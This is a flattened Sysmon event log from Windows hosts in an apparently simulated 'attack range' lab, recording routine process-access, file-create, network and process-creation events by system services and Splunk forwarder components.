14:15:16.644{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:16.644{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:16.644{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-1774-629A-713D-000000005F02}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:16.644{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:16.644{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:16.644{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1774-629A-713D-000000005F02}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:16.645{2E1864BB-1774-629A-713D-000000005F02}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000043751Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:16.749{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F23CB72FFD21574B14D8BFD6B12C447D,SHA256=8F5FEBF85DEE99C89C5C4EDBACB7389D3FFCCCB5B03E331D01F1EB10C894B747,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.751{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=FFA2542230CAF7933F40037E3CDA2223,SHA256=57B2F7AAF6070A8BFBBCFAA33BF91E2544A94711191432910FA5B731844A9F51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.689{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=215E4C8D2417C198EBBB06DC26102E3B,SHA256=4184EB21365B157C0ABAEEAA009CA697EF1981D903F8E9E37FE3803377C43393,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000193549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.684{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DDB7E6E4A14A2E2A2BD7C5C2088D977E,SHA256=E194D5B0D8C96B9137044AA4E1219A1C231931D091690EA79473A9B81A97BD66,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043753Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:15.689{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52311-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043752Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:17.843{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7170433B3C34A314C2643893BC6AE484,SHA256=0141648E0993485FFE874B86010DF3D9C9559F2141BDFC77844A49EE05B9F890,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.567{2E1864BB-1775-629A-723D-000000005F02}36366556C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.336{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1775-629A-723D-000000005F02}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.320{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-1775-629A-723D-000000005F02}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.320{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.320{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.320{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.320{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.320{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1775-629A-723D-000000005F02}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000193540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:17.321{2E1864BB-1775-629A-723D-000000005F02}3636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000193579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.889{2E1864BB-1776-629A-743D-000000005F02}60006616C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043754Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:15:18.937{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ECE5A9BA7B3EF6F6965287458AD8E33,SHA256=1E88AC82D206CD74ADA8A7C223BF8CAF0BCF234E8AAE7259F50D1B2BEBFB31DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000193578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.689{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1776-629A-743D-000000005F02}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.689{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.689{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.689{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.689{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.689{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1776-629A-743D-000000005F02}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000193572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:18.689{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1776-629A-743D-000000005F02}6000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program 